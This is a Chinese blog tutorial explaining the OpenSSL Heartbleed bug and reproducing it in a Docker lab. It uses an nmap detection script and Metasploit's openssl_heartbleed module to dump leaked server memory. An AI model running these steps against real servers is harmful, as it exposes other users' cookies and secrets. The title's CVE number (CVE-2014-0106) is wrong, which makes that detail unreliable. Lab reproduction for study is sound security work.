Heartbleed心臟出血原理及漏洞復現（CVE-2014-0106）

• 漏洞簡介
• 漏洞原理
• 漏洞復現

漏洞簡介

心臟出血是OpenSSL庫中的一個內存漏洞，攻擊者利用這個漏洞可以服務到目標進程內存信息，如其他人的Cookie等敏感信息。

漏洞原理

心臟出血漏洞主要通過攻擊者模擬向服務器端發送自己編寫的Heartbeat心跳數據包，主要是HeartbeatMessage的長度與payload的length進行匹配，若payload_lenght長度大于HeartbeatMes sage的length，則會在服務器返回的response響應包中產生數據溢出，造成有用數據泄露。

漏洞復現

1、啟動環境

docker ps -a

2、查看靶機IP

docker ps -a

3、打開kali，使用nmap掃描，使用script ssl-heartbleed.nse板塊
命令如下：nmap -sV -p 443 –script ssl-heartbleed.nse 192.168.18.132

nmap -sV -p 443 –script ssl-heartbleed.nse 192.168.18.132

確實是存在heartbleed漏洞的
4、然后打開msf

msfconsole

5、用msf的heartbleed模塊，實現Heartbleed漏洞的利用。
show options查看參數。

use auxiliary/scanner/ssl/openssl_heartbleed show options

6、設置靶機的ip地址

set RHOST 192.168.18.132

7、設置verbose展示細節，顯示leak出來的數據，多次run可能看到關鍵隱私信息

set verbose true run

總結

以上是生活随笔為你收集整理的Heartbleed心脏出血原理及漏洞复现（CVE-2014-0106）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。